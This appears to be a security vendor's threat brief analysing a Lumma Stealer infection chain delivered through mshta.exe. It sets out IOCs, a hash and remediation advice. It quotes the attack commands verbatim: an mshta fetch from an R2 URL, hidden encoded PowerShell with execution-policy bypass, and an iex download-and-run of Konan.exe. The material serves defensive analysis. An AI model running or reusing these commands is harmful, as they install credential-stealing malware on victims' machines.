Lumma Stealer spreads via LOLbin - mshta.exe

By Pritam_Rakshit_ on March 13, 2026 (Last modified: March 13, 2026)

Threat Brief

The observed execution chain demonstrates a multi-stage delivery mechanism used to deploy Lumma Stealer. The infection begins through mshta.exe, which retrieves a remote payload hosted on Cloudflare R2 infrastructure. This is followed by obfuscated PowerShell execution using Base64 and hexadecimal string decoding techniques to conceal the final payload retrieval and execution.

The final payload downloaded as Konan.exe has been identified as Lumma Stealer, a credential theft malware family commonly used for browser credential harvesting, cryptocurrency wallet theft, and session hijacking.

Execution Details

Stage 1 - Initial Payload Retrieval

mshta.exe https://pub-c63c7c29d77b458bbd15fb8ef097a5a2.r2.dev/jonan.tmp

The attack starts with mshta.exe, a legitimate Windows utility abused to execute remote HTA or script content. This allows adversaries to bypass basic application controls and execute remote content directly.

Stage 2 - Obfuscated PowerShell Execution

powershell.exe -w h -nop -ep un -E [Base64 Encoded Payload]

The second stage uses PowerShell with:

  • -w h → Hidden window
  • -nop → No profile loading
  • -ep un → Execution policy bypass
  • -E → Base64 encoded payload

The payload decodes a hexadecimal string which reconstructs malicious commands dynamically and invokes them using Invoke-Expression (iex).

Stage 3 - Final Payload Download

powershell -iex(https://pub-1c0b594021be4e21a096a2d2e4d34e24.r2.dev/Konan.exe)

The decoded script downloads Konan.exe into the user's temporary directory and executes it immediately. The payload uses curl-style retrieval and writes into %TEMP% before launch.

Stage 4 - Malware Execution

File executed: Konan.exe

SHA256: c4122532331cd5f1f5c11727a853b9061ef2c4ceb0889914282e7dfd62542204

IOCs

File Hash

c4122532331cd5f1f5c11727a853b9061ef2c4ceb0889914282e7dfd62542204

Domains

  • toptalentw.top
  • tropiscbs.live
  • woodpeckersd.run
  • zootechq.run
  • geographys.run
  • biosphxere.digital
  • buzzarddf.live
  • parakehjet.run
  • bearjk.live

Cloudflare R2 Delivery URLs

  • pub-c63c7c29d77b458bbd15fb8ef097a5a2.r2.dev
  • pub-1c0b594021be4e21a096a2d2e4d34e24.r2.dev

Remediation

  • Block execution of mshta.exe where not required.
  • Monitor PowerShell execution using hidden window and encoded command arguments.
  • Block outbound traffic to suspicious Cloudflare R2 domains.
  • Isolate infected systems immediately if Konan.exe execution is detected.
  • Reset browser credentials and invalidate active sessions.
  • Deploy IOC-based detection for listed domains and SHA256 hash.
  • Enable EDR detections for hex-decoding and Invoke-Expression chains.